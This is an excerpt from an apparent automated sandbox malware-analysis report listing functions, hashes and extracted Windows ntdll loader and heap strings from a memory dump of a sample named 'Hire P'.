                                                            • Opcode Fuzzy Hash: 011ced80e5b360036e3050f047e31221db798b0484ff6b2d64328ccc83c80db2
                                                            • Instruction Fuzzy Hash: F1A16B719556299BDB35EF68CC88BEAF7B8EF48700F1001E9E909A7250D7359E84CF90
                                                            Function 010E0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Failed to allocated memory for shimmed module list, xrefs: 0112A10F
                                                            • LdrpCheckModule, xrefs: 0112A117
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0112A121
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-161242083
                                                            • Opcode ID: 6b68fb31109c3b48d174faee371989b98c0e0a43d24efcaf5b2510a830ae88b5
                                                            • Instruction ID: 904566c8b69e316d976c34525813e0f37571152098203e2bc0bb6e2f4cec75f6
                                                            • Opcode Fuzzy Hash: 6b68fb31109c3b48d174faee371989b98c0e0a43d24efcaf5b2510a830ae88b5
                                                            • Instruction Fuzzy Hash: 1971FF70A0030A9FDB29EF69C984AAEB7F4FF44704F14447DE992AB605E374A991CB40
                                                            Function 010D0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-1334570610
                                                            • Opcode ID: 88ce4003f702e37c04983e954164b010aaef685e649ec9f06a7a7aa3ff0ba223
                                                            • Instruction ID: ca6bb4458fa4b1531834fbf30c01973d007c1d70096f737b70df047d46f21856
                                                            • Opcode Fuzzy Hash: 88ce4003f702e37c04983e954164b010aaef685e649ec9f06a7a7aa3ff0ba223
                                                            • Instruction Fuzzy Hash: 6661B070604301DFDB69CF28C484BAABBE2FF45714F148599F4998F296D770E891CB91
                                                            Function 010FC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 011382E8
                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 011382DE
                                                            • Failed to reallocate the system dirs string !, xrefs: 011382D7
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-1783798831
                                                            • Opcode ID: 201ae57f9ceac6efd3b90d545b2d92d729c4966fa717ddb14e6bb246f6ad1bbb
                                                            • Instruction ID: 568623773298b4247406192f69ae01e7b12bb89c63f8b6846575928830609e07
                                                            • Opcode Fuzzy Hash: 201ae57f9ceac6efd3b90d545b2d92d729c4966fa717ddb14e6bb246f6ad1bbb
                                                            • Instruction Fuzzy Hash: 5F4120B1504309ABD728EB69D986F9B77E8BF58710F00493EFA94D7290E770D840CB91
                                                            Function 0117C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • @, xrefs: 0117C1F1
                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0117C1C5
                                                            • PreferredUILanguages, xrefs: 0117C212
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                            • API String ID: 0-2968386058
                                                            • Opcode ID: 367afed0eff1d542839cc62abc7d2e971bfe1516b50a31c45c2b3ce9c8bdbb00
                                                            • Instruction ID: e1ab0fdb7325ed18f4a15093bf5b3f9bf81291367bc537749ab778e8c461bd67
                                                            • Opcode Fuzzy Hash: 367afed0eff1d542839cc62abc7d2e971bfe1516b50a31c45c2b3ce9c8bdbb00
                                                            • Instruction Fuzzy Hash: 4B415671E0020AEBDF19DFD8C855FEEB7B9AB54704F14416AE605F7280D7749A44CB90
                                                            Function 01154144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                            • API String ID: 0-1373925480
                                                            • Opcode ID: d18148a80b7d5ce9a0353561b25e0101b61c9ac544d692602d47d01aac02b30d
                                                            • Instruction ID: 35d0219708588b32bea3c68e3fdda6c9c2a8e877761f23db1ce044e0647c9bd9
                                                            • Opcode Fuzzy Hash: d18148a80b7d5ce9a0353561b25e0101b61c9ac544d692602d47d01aac02b30d
                                                            • Instruction Fuzzy Hash: 56412272A00368CBEB2ADBD9D844BADBBB4FF55380F140059DD61EBB81E7349981CB11
                                                            Function 01144755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • LdrpCheckRedirection, xrefs: 0114488F
                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01144888
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01144899
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                            • API String ID: 0-3154609507
                                                            • Opcode ID: 9c1bb89218627a14ecf4b2c3f58a78302a02e4d894af67ba637b9faddf3794e5
                                                            • Instruction ID: 906cdcc8ceb0423c0ada20adad46296675d75bd555b8591246a1126a6d581c54
                                                            • Opcode Fuzzy Hash: 9c1bb89218627a14ecf4b2c3f58a78302a02e4d894af67ba637b9faddf3794e5
                                                            • Instruction Fuzzy Hash: 1B41E432A00A529FDB29CF9CD840B267BE4FF49E50B06016DED94E7B11E330D801CB81
                                                            Function 010D0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-2558761708
                                                            • Opcode ID: 99dde28e25641c4c9a9f4b94c1484bd18d87f921658a3c4ccf5ecceff2d97aef
                                                            • Instruction ID: f2a188000a975d7cecd3b10598becfc40d837888d209e644e7fb6054aa282c20
                                                            • Opcode Fuzzy Hash: 99dde28e25641c4c9a9f4b94c1484bd18d87f921658a3c4ccf5ecceff2d97aef
                                                            • Instruction Fuzzy Hash: 1411E4313182929FDB5DCA19C8D4BFAF7A6EF40625F148169F48ACB255EB30DC50C751
                                                            Function 011420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01142104
                                                            • LdrpInitializationFailure, xrefs: 011420FA
                                                            • Process initialization failed with status 0x%08lx, xrefs: 011420F3
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-2986994758
                                                            • Opcode ID: b91b8e2ecece4a3b319056b8ef60f42c3a1035cca05f3def29ae3d2a063164c9
                                                            • Instruction ID: aff298b926b8901b777fa06d10d4e9ffc77193c614667b978d94842d4f13b509
                                                            • Opcode Fuzzy Hash: b91b8e2ecece4a3b319056b8ef60f42c3a1035cca05f3def29ae3d2a063164c9
                                                            • Instruction Fuzzy Hash: 8FF0C235641308ABE728E64DDC92FA93768EB44F58F940069FB507B685D3F0A980CA91
                                                            Function 010D03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: #%u
                                                            • API String ID: 48624451-232158463
                                                            • Opcode ID: b74a320ad5c9f939c7b0dd153d24e62422a17b9fffe304d60c9fa6aede7ded89
                                                            • Instruction ID: 187f1672accb05ab60cc39eb06688544a88ffb3cd327f8a27294e0305de4bef4
                                                            • Opcode Fuzzy Hash: b74a320ad5c9f939c7b0dd153d24e62422a17b9fffe304d60c9fa6aede7ded89
                                                            • Instruction Fuzzy Hash: B07169B1A0020A9FDB05DFA8C980FAEB7F8FF18704F144065E905AB251EB74ED51CBA1
                                                            Function 010CA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • LdrResSearchResource Enter, xrefs: 010CAA13
                                                            • LdrResSearchResource Exit, xrefs: 010CAA25
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                            • API String ID: 0-4066393604
                                                            • Opcode ID: bdceb5af3e2a45aeeabec17e2287d30ea90e3d82d63080144314080538215f49
                                                            • Instruction ID: 70d94841659b730bec1a30ed286aac50e4a58d25ed51cb2d01582d3113247a83
                                                            • Opcode Fuzzy Hash: bdceb5af3e2a45aeeabec17e2287d30ea90e3d82d63080144314080538215f49
                                                            • Instruction Fuzzy Hash: 7AE18F71F00219DBEB268F9CC980BEEBBB9BF08B14F10446AE951E7251E7389950CF51
                                                            Function 0118A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `$`
                                                            • API String ID: 0-197956300
                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                            • Instruction ID: 47fd6e9ece10615d61f618517d0302b816589588daa414ac2d7d8196c822d06d
                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                            • Instruction Fuzzy Hash: A4C1F4312043429BEB28EF28D841B6BBBE5AFC4318F188A2EF695C7290D775D545CF51
                                                            Function 0113E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: Legacy$UEFI
                                                            • API String ID: 2994545307-634100481
                                                            • Opcode ID: 24527b543a3d199565b955d7cce3d0273b3ae3d3900ff86740f41b36d12ae267
                                                            • Instruction ID: 45f5a658a4b1e8fc0ac98f4bcbbb0dbfd6995dd3265eeacf7bfe3a1195a7ff9f
                                                            • Opcode Fuzzy Hash: 24527b543a3d199565b955d7cce3d0273b3ae3d3900ff86740f41b36d12ae267
                                                            • Instruction Fuzzy Hash: FE615E71E017199FDB19DFA8C850BAEBBB5FF88704F14406DE649EB295D731A900CB50
                                                            Function 011643D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$MUI
                                                            • API String ID: 0-17815947
                                                            • Opcode ID: 8049a94938566489a9043f20429efe17319f969f3405cc3bd9a89b255b143c1d
                                                            • Instruction ID: 6b79e5a6b4c977f6c8b859f2e3e4ddc8a1a16a244ba6d8f9742465b3e75f9e67
                                                            • Opcode Fuzzy Hash: 8049a94938566489a9043f20429efe17319f969f3405cc3bd9a89b255b143c1d
                                                            • Instruction Fuzzy Hash: C05137B1E0021DAEDF15DFA9CC84AEEBBBCEB48754F100529E611B7690D7719E05CBA0
                                                            Function 010C04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • kLsE, xrefs: 010C0540
                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 010C063D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                            • API String ID: 0-2547482624
                                                            • Opcode ID: 0cfb27042c59f45eb6161e821435f3abae50b1d5905510187fa04fae2c5a631e
                                                            • Instruction ID: 18b6a7f5d3ae61f8aa56bb79816020e459a7ab4307c6efcda3bb601658ac7759
                                                            • Opcode Fuzzy Hash: 0cfb27042c59f45eb6161e821435f3abae50b1d5905510187fa04fae2c5a631e
                                                            • Instruction Fuzzy Hash: 0D51CE79600742CFD724DF78C5806ABBBE4AF88B04F10893EE6EA87245E7709545CF92
                                                            Function 010CA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 010CA309
                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 010CA2FB
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                            • API String ID: 0-2876891731
                                                            • Opcode ID: 03e473c644b81d89140c60df415e5dce4701892754d233877038c5610dc39e83
                                                            • Instruction ID: ac2f5d4592d7f96ba14d1f86da039c069ef42265f3cf17d90708a887ed2af744
                                                            • Opcode Fuzzy Hash: 03e473c644b81d89140c60df415e5dce4701892754d233877038c5610dc39e83
                                                            • Instruction Fuzzy Hash: 9141BE71B04659DBDB29CF69C850BAE7BB4FF84B00F1480A9E980DB291E3B5D900CF51
                                                            Function 010FA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: Cleanup Group$Threadpool!
                                                            • API String ID: 2994545307-4008356553
                                                            • Opcode ID: b767c943526d3bbe4fda6c7939b50ca92abb95601b308a395e2b4eedba40886d
                                                            • Instruction ID: 773ea0b06412ec3e20d90356f18b5c44c621dd90354b3fb671b508c44c95cd9d
                                                            • Opcode Fuzzy Hash: b767c943526d3bbe4fda6c7939b50ca92abb95601b308a395e2b4eedba40886d
                                                            • Instruction Fuzzy Hash: 5D01ADB2650700EFE312DF24CD46B1677E8E798715F00893DA69CCB590E374D804CB46
                                                            Function 010CC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: MUI
                                                            • API String ID: 0-1339004836
                                                            • Opcode ID: b2e483a8f83efbfff21a73a479f8c041067c84c608d68dc643da69b3056f4b9a
                                                            • Instruction ID: 21573ce60807c725f4a3380a88c5e53885531c6403465079367aa33d3c582e30
                                                            • Opcode Fuzzy Hash: b2e483a8f83efbfff21a73a479f8c041067c84c608d68dc643da69b3056f4b9a
                                                            • Instruction Fuzzy Hash: 8B825D75E002198FEB65CFA9C980BEDBBB1BF48B10F1481ADE999AB251D7309D41CF50
                                                            Function 01146420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 9e2024d8aacb2516b609d9f30b767efb1500d2168b5cf7be34dfbc05858f0123
                                                            • Instruction ID: d668f6eb27cb9769617bfcfde7eb06ca33bb8f1f4b267a98baac92d5adcbb3d5
                                                            • Opcode Fuzzy Hash: 9e2024d8aacb2516b609d9f30b767efb1500d2168b5cf7be34dfbc05858f0123
                                                            • Instruction Fuzzy Hash: 929184B1A40219AFEB25DF95CD85FEEBBB8EF59B54F104065F600AB190D774AD00CBA0
                                                            Function 010FA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: GlobalTags
                                                            • API String ID: 0-1106856819
                                                            • Opcode ID: 40b99cfb61b601cb866057f9771cf7bc9f33b1bc8775445b77c68f639811f4d8
                                                            • Instruction ID: 068b7e40d782b0a0ce528654d2d9a4e41f57be906b070bdb23065eb56af48c9b
                                                            • Opcode Fuzzy Hash: 40b99cfb61b601cb866057f9771cf7bc9f33b1bc8775445b77c68f639811f4d8
                                                            • Instruction Fuzzy Hash: 8B716BB5E0060AEFDF2DCF98C5906EDBBB1BF88714F14816EE945A7248E7718A41CB50
                                                            Function 01164978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .mui
                                                            • API String ID: 0-1199573805
                                                            • Opcode ID: 7b9129ae7b3e4b90de2c9902afd47fc10d8413fbb916766e1c7da8c43987cdd7
                                                            • Instruction ID: 530743610de6527435fff42546c47304aeaafebd81fb3ce5deb9c7cfd51f2ef1
                                                            • Opcode Fuzzy Hash: 7b9129ae7b3e4b90de2c9902afd47fc10d8413fbb916766e1c7da8c43987cdd7
                                                            • Instruction Fuzzy Hash: DF51B872D0022A9BDF19DF99D840AEEBBB8EF04A54F054129E951BB640D3359C11CBE4
                                                            Function 010DE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: EXT-
                                                            • API String ID: 0-1948896318
                                                            • Opcode ID: 4df55c697b60c08a4b933de838a21d38e7f733f1f32750287aa4c5a3d131c76b
                                                            • Instruction ID: 0e034d2609850371c04ccc16610476c6982592adc1eee09f968fc0c59a4f6d7a
                                                            • Opcode Fuzzy Hash: 4df55c697b60c08a4b933de838a21d38e7f733f1f32750287aa4c5a3d131c76b
                                                            • Instruction Fuzzy Hash: AA419E72608312ABD751DA75C884BAFBBE8BF88B14F45096DFAC4DB180E774D904C792
                                                            Function 010BCDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AlternateCodePage
                                                            • API String ID: 0-3889302423
                                                            • Opcode ID: f0ce0bd84f33ae8c6a34b0c700cdb040c3d011cbd3e672af2a6164731f253f05
                                                            • Instruction ID: b882abdd69a6375e2f7a97e3dcdb4137282613ad1e18789ced7201ad5ccf81a7
                                                            • Opcode Fuzzy Hash: f0ce0bd84f33ae8c6a34b0c700cdb040c3d011cbd3e672af2a6164731f253f05
                                                            • Instruction Fuzzy Hash: 5A41D172D01249EAEF29DB98DC80AEEFBF8FF84310F14416AE511E7254D7709A41CB51
                                                            Function 0113C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: BinaryHash
                                                            • API String ID: 0-2202222882
                                                            • Opcode ID: 298df512071ee6d11aac9919ed80468770d820e468e8cbbdf0e0706fa9d29ef9
                                                            • Instruction ID: 976d51aa8205205cb597d28f88f1212561457f00fbfb9268ad755d3807166233
                                                            • Opcode Fuzzy Hash: 298df512071ee6d11aac9919ed80468770d820e468e8cbbdf0e0706fa9d29ef9
                                                            • Instruction Fuzzy Hash: 574121B1D0062DAADB25DA50CC84FDEB77CAB54718F0045E6EB08BB144DB709E898FE4
                                                            Function 01156B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #
                                                            • API String ID: 0-1885708031
                                                            • Opcode ID: 8c9f18217b2d205887f64894f650f1a96cc96b5dcb1dab34166178f1be968108
                                                            • Instruction ID: 9700e758265586b6475a00e9d0ad1352cf2e1033a5e808ccb8f0d72b21f10a0e
                                                            • Opcode Fuzzy Hash: 8c9f18217b2d205887f64894f650f1a96cc96b5dcb1dab34166178f1be968108
                                                            • Instruction Fuzzy Hash: 6E312A31F00709DBEB2ADB69C850BEE7BB8DF55704F944028ED60AB282C775D905CB90
                                                            Function 0113CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: BinaryName
                                                            • API String ID: 0-215506332
                                                            • Opcode ID: a0db59dabb3c128ffcfa833ffcf65edbb6116ee84aff16d32ffc865b133bc6b7
                                                            • Instruction ID: 74afc80bf5c2dc6c1ac73ded271ccf62d3f58110f6f5d43137b42a7db675c27f
                                                            • Opcode Fuzzy Hash: a0db59dabb3c128ffcfa833ffcf65edbb6116ee84aff16d32ffc865b133bc6b7
                                                            • Instruction Fuzzy Hash: 0B31E576900519AFEB1EDB59C855FAFBB74EBC0790F01412AE905B7254D7309E04DBE0
                                                            Function 0114892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0114895E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                            • API String ID: 0-702105204
                                                            • Opcode ID: 3ea2d8b7ac6cc39c53a73ff329272cc75ea8279ee6ab7a8e5b029f2696212d20
                                                            • Instruction ID: 43ff17aa30f112ab497cf6f89aa2b4e9d0a9bf64f22701490adc86b68a8ef438
                                                            • Opcode Fuzzy Hash: 3ea2d8b7ac6cc39c53a73ff329272cc75ea8279ee6ab7a8e5b029f2696212d20
                                                            • Instruction Fuzzy Hash: 7F012B39211A06DFEA2D6F95DCC4B9A7F66EFC5E94B08002CF78116151DB206C81C793
                                                            Function 01162000 Relevance: .8, Instructions: 757COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 725b93ecd11761517a961774b891bd3d72401adbb363a394bf98ec52ed76a1e0
                                                            • Instruction ID: 8577386e80d39f9c20ac103bde51bb56b125614b9f567ae5bfdb2c227e7857ed
                                                            • Opcode Fuzzy Hash: 725b93ecd11761517a961774b891bd3d72401adbb363a394bf98ec52ed76a1e0
                                                            • Instruction Fuzzy Hash: E042D3726083418FD72DCF68C890A6BBBEDBF98344F08492DFA8297250D776D855CB52
                                                            Function 01158158 Relevance: .6, Instructions: 617COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f1a4a56f165cfc9b1d707a51a719ac17881936ad01d36c9dbbb474495abbbf8
                                                            • Instruction ID: d2d816ac356c10d0cbd6d0e3628a7f49c0efa97e93ad366dfe22f6b2cb58af1f
                                                            • Opcode Fuzzy Hash: 4f1a4a56f165cfc9b1d707a51a719ac17881936ad01d36c9dbbb474495abbbf8
